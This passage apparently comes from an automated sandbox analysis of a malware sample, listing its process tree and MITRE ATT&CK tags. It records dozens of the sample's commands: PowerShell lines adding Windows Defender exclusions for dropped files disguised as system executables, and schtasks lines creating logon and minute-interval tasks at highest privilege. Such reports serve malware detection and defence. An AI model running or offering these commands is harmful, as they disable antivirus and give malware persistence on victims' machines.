        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
        6⤵
        
        PID:5524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\browser\features\fontdrvhost.exe'
        6⤵
        
        PID:5740
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\powershell.exe'
        6⤵
        
        PID:312
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\conhost.exe'
        6⤵
        
        PID:5624
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\schtasks.exe'
        6⤵
        
        PID:6064
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\conhost.exe'
        6⤵
        
        PID:6032
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\cmd.exe'
        6⤵
        
        PID:5328
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\winlogon.exe'
        6⤵
        
        PID:2288
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\WmiPrvSE.exe'
        6⤵
        
        PID:1676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Links\powershell.exe'
        6⤵
        
        PID:5948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\conhost.exe'
        6⤵
        
        PID:4364
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Application Data\sppsvc.exe'
        6⤵
        
        PID:4796
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\conhost.exe'
        6⤵
        
        PID:4232
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yanBTldnYZ.bat"
        6⤵
        
        PID:4884
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:3160
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LIqDUaLb8G.bat"
        8⤵
        
        PID:308
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:5324
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        9⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5132
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b6uRiEqY03.bat"
        10⤵
        
        PID:4428
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:5444
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        11⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2500
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IMpAoVHioU.bat"
        12⤵
        
        PID:6004
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:5716
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5384
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1e6qhBZ49x.bat"
        14⤵
        
        PID:5172
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:2144
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        15⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5eI0Zh92hY.bat"
        16⤵
        
        PID:5972
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:3804
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        17⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tfVhKC50lX.bat"
        18⤵
        
        PID:5048
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:5668
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        19⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5504
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\j5VZ5DKdOS.bat"
        20⤵
        
        PID:5664
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:3532
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        21⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6VAw4LgrmW.bat"
        22⤵
        
        PID:3580
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:5164
        
        C:\Recovery\WindowsRE\schtasks.exe
        
        "C:\Recovery\WindowsRE\schtasks.exe"
        23⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zcjutnjrcv.bat"
        24⤵
        
        PID:1676
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:6084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\fontdrvhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\cmd.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2384
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SKB\LanguageModels\DllCommonsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 10 /tr "'C:\odt\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\odt\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Users\Public\AccountPictures\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\odt\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\odt\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\odt\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\odt\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Windows\ShellExperiences\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellExperiences\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Windows\fr-FR\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\odt\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
PID:516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\odt\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 7 /tr "'C:\Windows\SKB\LanguageModels\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 7 /tr "'C:\Windows\SKB\LanguageModels\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\ModemLogs\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\ModemLogs\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\ModemLogs\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\providercommon\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\providercommon\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\Adobe\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:96

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:32

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Oracle\Java\javapath\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Oracle\Java\javapath\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Oracle\Java\javapath\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\odt\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 7 /tr "'C:\Program Files\WindowsPowerShell\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5444

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 7 /tr "'C:\Program Files\WindowsPowerShell\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\providercommon\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
1⤵
PID:6028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Mozilla Firefox\browser\features\fontdrvhost.exe'" /f
1⤵
- Creates scheduled task(s)
PID:6060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\browser\features\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:6084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Mozilla Firefox\browser\features\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:1028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\powershell.exe'" /f
1⤵
- Creates scheduled task(s)
PID:6128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\powershell.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Mail\powershell.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\providercommon\WmiPrvSE.exe'" /f
1⤵
- Creates scheduled task(s)
PID:2272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\providercommon\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\providercommon\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\cmd.exe'" /f
1⤵
- Creates scheduled task(s)
PID:5460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\winlogon.exe'" /f
1⤵
PID:5588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
1⤵
PID:5704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Links\powershell.exe'" /f
1⤵
- Creates scheduled task(s)
PID:2340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Users\Admin\Links\powershell.exe'" /rl HIGHEST /f
1⤵
PID:5248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Links\powershell.exe'" /rl HIGHEST /f
1⤵
PID:4084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\PackageManifests\conhost.exe'" /f
1⤵
- Creates scheduled task(s)
PID:5776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\conhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\PackageManifests\conhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Application Data\sppsvc.exe'" /f
1⤵
PID:5836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\Application Data\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Application Data\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:4416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\conhost.exe'" /f
1⤵
- Creates scheduled task(s)
PID:520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\conhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:5420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\conhost.exe'" /rl HIGHEST /f
1⤵
PID:5484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

